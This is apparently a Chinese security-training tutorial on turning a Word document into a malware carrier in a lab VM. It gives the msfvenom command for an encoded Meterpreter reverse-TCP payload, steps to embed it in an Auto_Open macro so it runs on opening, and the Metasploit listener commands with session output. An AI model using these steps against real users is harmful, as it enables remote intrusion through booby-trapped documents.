网络安全kali之利用宏感染word文档获取shell

首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。

┌──(rootxuegod53)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e 
x86/shikata_ga_nai -i 10 -f vba-exe

视频教程

执行完成后会生成2段代码
第一段代码是MACRO CODE [ˈmækrəʊ kəʊd] 宏代码
从这里开始:
网络安全kali之利用宏感染word文档获取shell_第1张图片
到这里结束:
网络安全kali之利用宏感染word文档获取shell_第2张图片
第二段代码 payload。
在这里插入图片描述
注:*号中的内容不要,从这个往下开始复制,如下:
网络安全kali之利用宏感染word文档获取shell_第3张图片
一直到最后。

打开Word新建空白文档,新建宏
网络安全kali之利用宏感染word文档获取shell_第4张图片
宏名Auto_Open
网络安全kali之利用宏感染word文档获取shell_第5张图片
清除默认的代码,复制第一段code代码内容到编辑器中,然后返回到Word内容编辑区。
网络安全kali之利用宏感染word文档获取shell_第6张图片
复制第二段代码payload到word正文,然后保存文档。
网络安全kali之利用宏感染word文档获取shell_第7张图片
按Ctrl+s保存
网络安全kali之利用宏感染word文档获取shell_第8张图片
MSF配置侦听

msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
msf6 exploit(multi/handler) > jobs -K
msf6 exploit(multi/handler) > exploit

2、配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF,关闭word文档之后session不受影响。
网络安全kali之利用宏感染word文档获取shell_第9张图片
打开之后我们回到MSF控制台
在这里插入图片描述
Session已经建立

meterpreter > getuid 
Server username: XUESHEN\Administrator

我们尝试把payload转移到其他进程

meterpreter > getpid 		获取当前进程pid
Current pid: 2932
meterpreter > ps			#查看进程列表,在ps列出的进程列表,倒数第4个就是我们进程的pid

网络安全kali之利用宏感染word文档获取shell_第10张图片

关注公众号学神来啦,领取更多的学习干货和资料哦~
点我建立联系

你可能感兴趣的:(网络安全,程序员,码农,网络安全,kali,word)